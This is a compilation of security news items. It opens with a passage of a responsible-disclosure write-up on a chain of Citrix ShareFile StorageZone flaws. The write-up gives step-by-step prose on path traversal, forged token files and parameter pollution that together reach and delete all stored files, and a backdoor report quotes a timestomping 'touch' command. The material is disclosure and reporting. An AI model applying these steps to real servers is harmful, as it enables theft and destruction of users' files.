Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as temporary name for the file. The data that is uploaded is written to this file, and when the upload is finilized this file is added to the users ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the filesize of the secret.txt file we are trying to extract is 14 bytes instead of 13 as the modified info.txt indicated. We can upload a new info.txt file which does have the correct filesize, and the secret.txt file is succesfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the frequested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is a h parameter which contains a HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<!--?xml version="1.0" encoding="utf-8"?--><?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<DownloadTokenID>dt6bbd1e278a634e1bbde9b94ff8460b24</DownloadTokenID>
<RequestType>single</RequestType>
<BaseUrl>https://redacted.sf-api.eu/</BaseUrl>
<ErrorUrl>https://redacted.sf-api.eu//error.aspx?type=storagecenter-downloadprep</ErrorUrl>
<StorageBasePath>\\s3\sf-eu-1\;</StorageBasePath>
<BatchID>dt6bbd1e278a634e1bbde9b94ff8460b24</BatchID>
<ZipFileName>tfile</ZipFileName>
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Metadata>
<Item key="operatingsystem" value="Linux" />
</Metadata>
<IrmEnabled>false</IrmEnabled>
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<Items>
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
</Items>
<Log>
<EventID>fif11465-ba81-8b77-7dd9-4256bc375017</EventID>
<UserID>c7add7af-91ac-4331-b48a-0aeed4a58687</UserID>
<OwnerID>c7add7af-91ac-4331-b48a-0aeed4a58687</OwnerID>
<AccountID>a4ea881a-a4d5-433a-fa44-41acd5ed5a5f</AccountID>
<UserEmailAddress>fox-it@redacted</UserEmailAddress>
<Name>tfile</Name>
<FileCount>1</FileCount>
<AdditionalInfo>fif11465-ba81-8b77-7dd9-4256bc375017</AdditionalInfo>
<FolderID>foh160ab-aa5a-4e43-96fd-e41caed36cea</FolderID>
<ParentID>foh160ab-aa5a-4e43-96fd-e41caed36cea</ParentID>
<Path>/root/a4ea881a-a4d5-433a-fa44-41acd5ed5a5f/foh160ab-aa5a-4e43-96fd-e41caed36cea</Path>
<IncrementDownloadCount>false</IncrementDownloadCount>
<ShareID />
</Log>
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with toos such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not nessecary to calculate the signature as an attacker, since the application simply tells you what correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:

HMAC Url

However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:

uploadid-double.png

We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values which are separated with a comma. Only the first uploadid parameter is verified by the HMAC, since it operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Polution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attackers account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.

Conclusion

By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick with following up on the issues and rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown if they were using the hybrid setup in a vulnerable configuration. Therefor, the number of affected installations and if these issues were abused is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

[24]7.ai Payment Card Breach affected major firms, including Best Buy, After Delta Air Lines and Sears Holdings

A payment card breach suffered by [24]7.ai. between September 26 and October 12, 2017, is impacting major firm, including Best Buy, After Delta Air Lines and Sears Holdings.

Another day another data breach, while media are reporting the securityb breach suffered Delta Air Lines and Sears Holdings due to the [24]7.ai a payment card brech, also Best Buy company confirmed to have been impacted by the incident.

Best Buy offers chat services for customers via their phone or computer, while [24]7.ai provides online services to businesses in different industries, including Delta Air Lines and Sears Holdings, this means that other firm could have been impacted.

Best Buy annouced it will notify affected customers and offer free credit monitoring to them.

At the time of writing there is new about the extent of payment card breach, Best Buy pointed out that only a small fraction of online customers could have been impacted by the [24]7.ai hack.

“We, like many businesses, use a third-party for the technology behind this service and that company, [24]7.ai, told us recently that they were the victim of a cyber intrusion. Their information suggests that the dates for this illegal intrusion were between Sept. 27 and Oct. 12, 2017. [24]7.ai has indicated that customer payment information may have been compromised during that time and, if that were the case, then a number of Best Buy customers would have had their payment information compromised, as well.” reads the security advisory published by Best Buy.

“As best we can tell, only a small fraction of our overall online customer population could have been caught up in this [24]7.ai incident, whether or not they used the chat function.”

best buy

Delta published a security advisory to notify its customers, the airline speculates attackers infected [24]7.ai systems with a malware that was able to siphon payment card data entered on websites that use the [24]7.ai chat software. It seems that customers of the affected firms may be impacted even if they have not directly used the chat functionality.

The instrusion occurred between September 26 and October 12, 2017.

“We understand malware present in [24]7.ai’s software between Sept. 26 and Oct. 12, 2017, made unauthorized access possible for the following fields of information when manually completing a payment card purchase on any page of the delta.com desktop platform during the same timeframe: name, address, payment card number, CVV number, and expiration date.” reads the advisory published by Delta Airline.

No other customer personal information, such as passport, government ID, security or SkyMiles information was impacted.”

According to Delta, hundreds of thousands of customers may have been impacted by the payment card breach.

Sears Holdings explained that the payment card breach has impacted the credit card information of less than 100,000 customers.

Both Sears and Delta Airline were notified by [24]7.ai in mid March while the incident occurred in 2017.

Pierluigi Paganini

(Security Affairs – [24]7.ai, Best Buy)

The post [24]7.ai Payment Card Breach affected major firms, including Best Buy, After Delta Air Lines and Sears Holdings appeared first on Security Affairs.

Cisco Smart Install Protocol misuse could expose critical infrastructure to attacks

Cisco PSIRT has published a new security advisory for abuse of the Smart Install protocol, the IT giant has identified hundreds of thousands of exposed devices online.

Cisco is advising organizations that hackers could target its switches via the Smart Install protocol. The IT giant has identified hundreds of thousands of exposed devices and warned critical infrastructure using them of potential risks.

Smart Install is a legacy plug-and-play configuration and image-management feature that provides zero-touch deployment for new switches.

In February 2017, researchers from Cisco Talos observed a spike in Internet scans attempting to discover unprotected Cisco devices that had Smart Install feature enabled.

Research has indicated that malicious actors may be leveraging detailed knowledge of the Smart Install Protocol to obtain copies of customer configurations from affected devices.” reported Cisco Talos last year.

“The attack leverages a known issue with the Smart Install protocol. Cisco PSIRT has published a security response to this activity. Abuse of the Smart Install protocol can lead to modification of the TFTP server setting, exfiltration of configuration files via TFTP, replacement of IOS image and potentially execution of IOS commands.”

The researchers also reported that attackers were using an open source tool to scan for affected systems, called the Smart Install Exploitation Tool (SIET),

Now Cisco PSIRT has published a new security advisory for abuse of the protocol.

“Cisco is aware of a significant increase in Internet scans attempting to detect devices where, after completing setup, the Smart Install feature remains enabled and without proper security controls. This could leave the involved devices susceptible to misuse of the feature. ” reads the new security advisory.

“Several researchers have reported on the use of Smart Install (SMI) protocol messages toward Smart Install clients, also known as integrated branch clients (IBC), allowing an unauthenticated, remote attacker to change the startup-config file and force a reload of the device, load a new IOS image on the device, and execute high-privilege CLI commands on switches running Cisco IOS and IOS XE Software.”

At the end of March, Cisco patched more than 30 vulnerabilities in its IOS software, including the CVE-2018-0171 flaw that affects the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software. The flaw could be exploited by an unauthenticated, remote attacker to cause a reload of a vulnerable device or to execute arbitrary code on an affected device.

“The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786.” reads the security advisory published by Cisco.

Cisco experts revealed they had identified roughly 250,000 vulnerable Cisco devices with TCP port 4786 open. A recent scan performed by Cisco revealed 168,000 systems are exposed online.

CISCO Smart Install scans

Since Embedi has released technical details and proof-of-concept (PoC) code for the exploitation of the CVE-2018-0171 vulnerability, risk of attacks has dramatically increased.

At the time, there is no evidence that CVE-2018-0171 has been exploited in attacks.

Cisco published recommendations for preventing such kind of attacks and urged customers to disable the feature if not needed.

Pierluigi Paganini

(Security Affairs – hacking, Cisco)

The post Cisco Smart Install Protocol misuse could expose critical infrastructure to attacks appeared first on Security Affairs.

OSX_OCEANLOTUS.D, a new macOS backdoor linked to APT 32 group

Security experts at Trend Micro have discovered a new macOS backdoor that they linked to the APT 32 (OceanLotus, APT-C-00, SeaLotus, and Cobalt Kitty) cyber espionage group.

The APT32 group has been active since at least 2013, according to the experts it is a state-sponsored hacking group. The hackers hit organizations across multiple industries and have also targeted foreign governments, dissidents, and journalists.

Since at least 2014, experts at FireEye have observed APT32 targeting foreign corporations with an interest in Vietnam’s manufacturing, consumer products, and hospitality sectors. The APT32 is also targeting peripheral network security and technology infrastructure corporations, and security firms that may have connections with foreign investors.

The APT32 group uses custom-built malware for its attacks, the newly discovered macOS backdoor was tracked by experts at Trend Micro as OSX_OCEANLOTUS.D.

The researchers found the backdoor on macOS systems that have the Perl programming language installed.

“We identified a MacOS backdoor (detected by Trend Micro as  OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. APT 32, APT-C-00, SeaLotus, and Cobalt Kitty).” reads the analysis published by Trend Micro.

“The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed.”

The hackers used spear-phishing messages as attack vectors, the backdoor is distributed via weaponized documents attached to emails. The bait document masquerades as the registration form for an event with HDMC, an organization in Vietnam that advertises national independence and democracy.

APT 32 _MacOS_backdoor

The malicious document contains an obfuscated macros with a Perl payload. The macro extracts an XML file (theme0.xml) from the document, it is a Mach-O 32-bit executable with a  0xFEEDFACE signature that acts as a dropper for the final OSX_OCEANLOTUS.D backdoor.

“All strings within the dropper, as well as the backdoor, are encrypted using a hardcoded RSA256 key. There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string.” continues the report.

“Using the setStartup() method, the dropper first checks if it is running as a root or not. Based on that, the GET_PROCESSPATH and GET_PROCESSNAME methods will decrypt the hardcoded path and filename where the backdoor should be installed.”

Once the dropper has installed the backdoor, it will set its attributes to “hidden” and set file date and time to random values using the touch command:

touch –t YYMMDDMM “/path/filename” > /dev/null.

It also changes the permissions to 0x1ed = 755, which is equal to u=rwx,go=rx.

The backdoor loops on two main functions, infoClient and runHandle; infoClient is used to collect platform information and send them to the command and control (C&C) server, meanwhile runHandle implements backdoor capabilities.

The discovery of a new backdoor linked to the APT32 group confirms that the state-sponsored crew was very active in the last months.

Pierluigi Paganini

(Security Affairs – APT 32, state-sponsored hacking)

The post OSX_OCEANLOTUS.D, a new macOS backdoor linked to APT 32 group appeared first on Security Affairs.

Zuckerberg admitted public data of its 2.2 billion users has been scraped by Third-party entities

Third-party scrapers have exploited an issue in the Facebook ’s search function that allows anyone to look up users via their email address or phone numbers.

Facebook revealed on Wednesday that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought.

Facebook is the middle of a storm, Mark Zuckerberg admitted public data of its 2.2 billion users has been compromised over the course of several years by third-party actors that gathered information on its users.

Third-party scrapers have exploited an issue in the Facebook’s search function that allows anyone to look up users via their email address or phone numbers.

Users name come up in Facebook searches is they don’t explicitly disable this security setting.

“Until today, people could enter another person’s phone number or email address into Facebook search to help find them. This has been especially useful for finding your friends in languages which take more effort to type out a full name, or where many people have the same name.” reads a blog post published by  CTO Mike Schroepfer.

“However, malicious actors have also abused these features to scrape public profile information by submitting phone numbers or email addresses they already have through search and account recovery. Given the scale and sophistication of the activity we’ve seen, we believe most people on Facebook could have had their public profile scraped in this way. “

Schroepfer announced that Facebook has now disabled this feature and is changing the account recovery procedure to reduce the scraping activities.
Facebook

Zuckerberg confirmed the extent of the scraping activity during a call with the press:

“I would assume if you had that setting turned on that someone at some point has access to your public information in some way.explained Zuckerberg.

Zuckerberg blamed himself for what has happened to his company and promtly announced further improvements in term of privacy and security.

When asked if he still considered himself the best person to run the company, he said, “Yes.”

Pierluigi Paganini

(Security Affairs – Zuckerberg, privacy)

The post Zuckerberg admitted public data of its 2.2 billion users has been scraped by Third-party entities appeared first on Security Affairs.

North Korea-Linked Lazarus APT suspected for online Casino assault

The North Korea-linked APT group known as Lazarus made the headlines again for attacking an online casino in Central America and other targets.

The activity of the Lazarus Group (aka Hidden Cobra) surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.  Security researchers discovered that North Korean Lazarus APT group was behind attacks on banks, including the Bangladesh cyber heist.

Now security experts from ESET uncovered a cyber attack against an online casino in Central America and on other targets, in all the assaults hackers used similar hacking tools, including the dreaded KillDisk disk-wiper.

The experts found several backdoors and a simple command line tool that was designed to inject into/kill processes, terminate/reinstall services, and drop/remove files.

Most of the tools were specifically designed to run as a Windows service and require administrator privileges for their execution.

ESET detailed a TCP backdoor dubbed Win64/NukeSped, a console application that is installed in the system as a service.

The backdoor implements a set of 20 commands whose functionality is similar to previously analyzed Lazarus samples.

“Win64/NukeSped.W is a console application that is installed in the system as a service. One of the initial execution steps is dynamically resolving the required DLL names, on the stack:” states the analysis published by ESET.

“Likewise, procedure names of Windows APIs are constructed dynamically. In this particular sample, they are visible in plaintext; in other past samples that we’ve analyzed they were base64-encoded, encrypted or resolved on the stack character by character”

Lazarus backdoor code

The backdoor allows attackers to gather information on the system, create processes, search for files, drop files on the infected systems, and inject code into processes, including Explorer.

Researchers from ESET also detailed session hijacker, dubbed Win64/NukeSped.AB, that is a console application capable of creating a process as another currently–logged-in user on the target system.

The session hijacker was spotted in the attack against the casino, researchers at ESET believe it is the same malware used in the attacks against Polish banks and Mexican entities.

ESET pointed out that at least two variants of the KillDisk malware were used in the attack that appear not linked to past wiper-based attacks, like the ones that hit Ukraine in December 2015 and December 2016.

“KillDisk is a generic detection name that ESET uses for destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable.” continues the report.

“Sub-family variants that do have strong code similarities, are sometimes seen separate cyberattacks and thus can help us make connections, as here. Other cases, for example the directed cyberattacks against high-value targets in Ukraine in December 2015 and December 2016, also employed KillDisk malware, but those samples were from different KillDisk sub-families, so are most likely unrelated to these attacks.”

According to ESET, more than 100 machines belonging to the Central American online casino were infected with the two variants of Win32/KillDisk.NBO.

It is still unclear if the attackers used the KillDisk wiper to cover the tracks of an espionage campaign, or if the malicious code was used in an extortion schema or sabotage.

The presence of the KillDisk wipers and various Lazarus-linked malware suggests that the APT group was responsible for the attack.

Experts also found that both variants present many similarities with the ones that previously targeted financial organizations in Latin America.

The attackers also used the Mimikatz tool to extract Windows credentials, a tool designed to recover passwords from major web browsers, malicious droppers and loaders to download and execute their tools onto the victim systems.

The hackers leveraged Radmin 3 and LogMeIn as remote access tools.

“This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else).” concluded ESET.

“The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.” 

Pierluigi Paganini

(Security Affairs – Lazarus APT, North Korea)

The post North Korea-Linked Lazarus APT suspected for online Casino assault appeared first on Security Affairs.

Thousands of compromised Magento websites delivering Malware

Hackers compromised hundreds of Magento e-commerce websites to steal credit card numbers and install crypto-mining malware.

According to the security firm Flashpoint, hackers launched brute-force attacks against Magento installs, they used a dictionary composed of common and known default Magento credentials.

“Ecommerce websites running on the popular open-source Magento platform are being targeted by attackers who are using brute-force password attacks to access administration panels to scrape credit card numbers and install malware that mines cryptocurrency.” reads the analysis published by Flashpoint.

“The Magento sites are being compromised through brute-force attacks using common and known default Magento credentials.”

The security firms revealed that at hackers already compromised at least 1,000 Magento admin panels, most of the victims are in the US and Europe and operate in the education and healthcare industries.

The threat actors behind this campaign are also targeting other popular e-commerce-processing CMS such as Powerfront CMS and OpenCarts.

According to the experts, it quite easy to find discussions on crime forums about how to compromise CMS platforms

The lack of proper security measures makes it easy for crooks to compromise websites, sometimes just using a simple script.

“Brute-force attacks such as these are simplified when admins fail to change the credentials upon installation of the platform. Attackers, meanwhile, can build simple automated scripts loaded with known credentials to facilitate access of the panels.” continues the post.

When hackers successfully compromised a Magento installation, they can inject malicious code into the core file to perform a wide range of malicious activities, such as stealing payment card data from the website.

The attackers can also use the compromised Magento installs to mine cryptocurrency by using a malware such as the Rarog cryptocurrency miner.

The compromised sites return an exploit masquerades as a phony Adobe Flash Player update, once the victims will launch it a malicious JavaScript is executed, its function is to download malware from attacker-controlled servers on GitHub and other compromised sites onto the victim’s computer.

“Analysts said the infection chain begins with the installation of data-stealing malware called AZORult from a binary hosted on GitHub. AZORult then downloads additional malware; in this campaign, the additional malware is the Rarog cryptocurrency miner.” continues the analysis.

“The attackers are keen on avoiding detection and update the malicious files daily in order to sidestep signature- and behavior-based detection. Flashpoint said the accounts hosting these files have been active since 2017.”

Magento Infographic-813x1024

Flashpoint, with the support of law enforcement, is notifying victims of the security breaches.

Magento admins are recommended to review CMS account logins and adopt mitigation measured against brute-force attacks, for example by limiting the number of attempts or enforcing two-factor authentication.

Pierluigi Paganini

(Security Affairs – Magento, hacking)

The post Thousands of compromised Magento websites delivering Malware appeared first on Security Affairs.

Microsoft issued out-of-band patch to fix CVE-2018-0986 Malware Protection Engine flaw

On April 3, Microsoft Out-Of-Band Security Update to address the CVE-2018-0986 vulnerability affecting the Microsoft Malware Protection Engine (MMPE).

Microsoft Malware Protection Engine is the core component for malware detection and cleaning of several Microsoft anti-malware software. It is currently implemented in Windows Defender, Microsoft Security Essentials, Microsoft Endpoint Protection, Windows Intune Endpoint Protection, and Microsoft Forefront Endpoint Protection.

The CVE-2018-0986 flaw could be exploited by attackers to execute malicious code on a Windows system with system privileges to gain the full control of the vulnerable machine.

The CVE-2018-0986 vulnerability rated as ‘critical’ was discovered by Thomas Dullien, white hat hacker at the Google Project Zero.

“A remote code execution vulnerability exists when the Microsoft Malware Protection Engine does not properly scan a specially crafted file, leading to memory corruption. An attacker who successfully exploited this vulnerability could execute arbitrary code in the security context of the LocalSystem account and take control of the system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.“reads  the security advisory published by Microsoft.

“To exploit this vulnerability, a specially crafted file must be scanned by an affected version of the Microsoft Malware Protection Engine,” 

According to the experts, it is quite easy to exploit the flaw, an attacker can deploy the malicious code inside JavaScript files hosted on the website then it needs to trick the victim into visiting it. Another attack scenario sees the hackers send the malicious code as attachment of an email sent to the victim, or via an instant messaging client.

The attack doesn’t need user interaction because the Microsoft Malware Protection Engine automatically scans all incoming files.

Experts pointed out that Windows Defender is enabled by default on Windows 10.

Microsoft has addressed the flaw in MMPE version 1.1.14700.5, the security patch is going to be delivered without needing user interaction.

CVE-2018-0986

“For affected software, verify that the Microsoft Malware Protection Engine version is 1.1.14700.5 or later.

If necessary, install the update Administrators of enterprise antimalware deployments should ensure that their update management software is configured to automatically approve and distribute engine updates and new malware definitions. Enterprise administrators should also verify that the latest version of the Microsoft Malware Protection Engine and definition updates are being actively downloaded, approved and deployed in their environment.” states Microsoft.

“For end-users, the affected software provides built-in mechanisms for the automatic detection and deployment of this update. For these customers, the update will be applied within 48 hours of its availability. The exact time frame depends on the software used, Internet connection, and infrastructure configuration.”

Pierluigi Paganini

(Security Affairs – CVE-2018-0986 vulnerability, Microsoft Malware Protection Engine)

The post Microsoft issued out-of-band patch to fix CVE-2018-0986 Malware Protection Engine flaw appeared first on Security Affairs.

Many natural gas pipeline operators in the U.S. Gas affected by cyberattack

Natural gas pipeline operators in the United States have been affected by a cyber attack that hit a third-party communications system.

The hackers targeted the Latitude Technologies unit at the Energy Services Group, but the attack did not impact operational technology.

At least four US pipeline operators were affected by the attack on their electronic systems, the Energy Transfer Partners was the first company that reported problems with its Electronic Data Interchange (EDI) system.

The Electronic Data Interchange platform used by businesses to exchange sensitive documents, including invoices and purchase orders.

Latitude currently provides EDI services to more than 100 natural gas pipeline firms, storage facilities, utilities, law firms, and energy marketers across the US. The companies in the energy industry use it to manage key energy transactions.

According to a report published by Bloomberg, the attack against Latitude affected Boardwalk Pipeline Partners, Chesapeake Utilities Corp.’s Eastern Shore Natural Gas, and ONEOK, Inc.

“We do not believe any customer data was compromised,” Latitude Technologies unit of Energy Services Group told Bloomberg.

“We are investigating the re-establishment of this data,” Latitude said in a message to customers.”

natural gas pipeline operators

The Department of Homeland Security is investigating the incident, at the time of writing there are no details about the cyber attack.

On Tuesday, Latitude notified its customers that the restoration of EDI services had been completed.

“Monday 4/3/2018 7:49am We have completed the initial restoration of the system. We are now working towards increasing performance. While we believe things to be fully restored, we will continue to monitor for gaps in functionality.” states the advisory published by Latitude Technologies.

“Please notify us if you encounter any missing capabilities so we can address them ASAP. Please contact us with any questions at 972-519-5451. Thank you for your patience. Please check this web site for continuing updates”

Who is behind the attack?

At the time it is impossible to determine the nature of the attackers, financially motivated cybercrime gangs could be interested in stealing sensitive information and use them to blackmail firms. It is likely that crooks targeted the natural gas pipeline operators for extortion purposes.

Another scenario sees nation-state actors targeting critical infrastructure, in this case, EDI services are a mine of information for hackers that could use them to launch further attacks.

In October 2017, the US Department of Homeland Security (DHS) and the FBI have issued a warning that APT groups are actively targeting government departments, and firms working in the energy, nuclear, water, aviation, and critical manufacturing sectors.

“This isn’t the first time U.S. pipelines have been targeted. In 2012, a federal cyber response team said in a note that it had identified a number of “cyber intrusions” targeting natural gas pipeline sector companies.” concluded Bloomberg.

“The group, the Industrial Control Systems Cyber Emergency Response Team, is a division of Homeland Security.”

Pierluigi Paganini

(Security Affairs – natural gas pipeline operators, critical infrastructure)

The post Many natural gas pipeline operators in the U.S. Gas affected by cyberattack appeared first on Security Affairs.

What is Mitre’s ATT&CK framework? What red teams need to know

The ATT&CK framework allows security researchers and red teams to better understand hacker threats.The ATT&CK framework, developed by Mitre Corp., has been around for five years and is a living,

The post What is Mitre’s ATT&CK framework? What red teams need to know appeared first on The Cyber Security Place.

Panerabread.com breach could have impacted millions

Customers who signed up for a Panerabread.com account in order to order fast-casual baked goods may want to guard their dough. Security researcher Brian Krebs reported yesterday that the website for the bakery chain leaked millions of customer records, including names, emails, physical addresses, birthdays, and the last four digits of customers’ credit card numbers.

Until Monday, millions of customer data points were accessible on the site as plain text—an oversight that Krebs maintains left data exposed for at least eight months. While Panera was contacted by security researcher Dylan Houlihan back in August 2017 about the leak, it appears they did not take action to fix it, despite reassurances they were working on a resolution.

Once Krebs notified Panera about the breach, the company took its website offline for a brief period of time. When the site came back online, the customer data was no longer available.

Panera issued statements to the press that they moved to fix the breach hours after Krebs reached out to them, though they didn’t address the eight-month gap in action from their first notification. In addition, they stated that only 10,000 customer records were exposed, though researcher HoldSecurity claims it’s more like 37 million.

While this story is still developing, we urge our readers to take necessary precautions to protect their data. An unprecedented season of breaches in 2017 gave way to more breach discoveries in early 2018, with companies such as Orbitz, Lord & Taylor/Saks Fifth Avenue, and MyFitnessPal collectively exposing more than 155 million users.

Recognize that while the flood of data breaches in itself is alarming, we still haven’t seen the full potential for the consequences of giving such valuable data freely to the black market. As tax season comes to a close, for example, we may be poised for a deluge of fraudulent claims and identity theft as criminals try to cash in on their data. Because of this, we suggest taking similar steps as after the Equifax breach, which includes monitoring credit reports, staying on high alert for email, phone, or text scams, and enabling alerts on your accounts.

The more we see infringements of the size and proportion of the Panerabread.com breach, the more we caution users to just assume their data has been compromised. Right now, the best we can do—until companies buckle down harder on security and privacy protocols—is to caution everyone to protect their data from being used to harm them.

Stay safe, everyone.

The post Panerabread.com breach could have impacted millions appeared first on Malwarebytes Labs.

Google to banish cryptocurrency mining extensions from official Chrome Web Store

Google will ban cryptocurrency mining extensions from the official Chrome Web Store after finding many of them abusing users’ resources without consent.

The number of malicious extensions is rapidly increased over the past few months, especially those related to mining activities.

The company has introduced a new Web Store policy that bans any Chrome extension submitted to the Web Store that mines cryptocurrency.

“Until now, Chrome Web Store policy has permitted cryptocurrency mining in extensions as long as it is the extension’s single purpose, and the user is adequately informedabout the mining behavior.” reads a blog post published by Google.

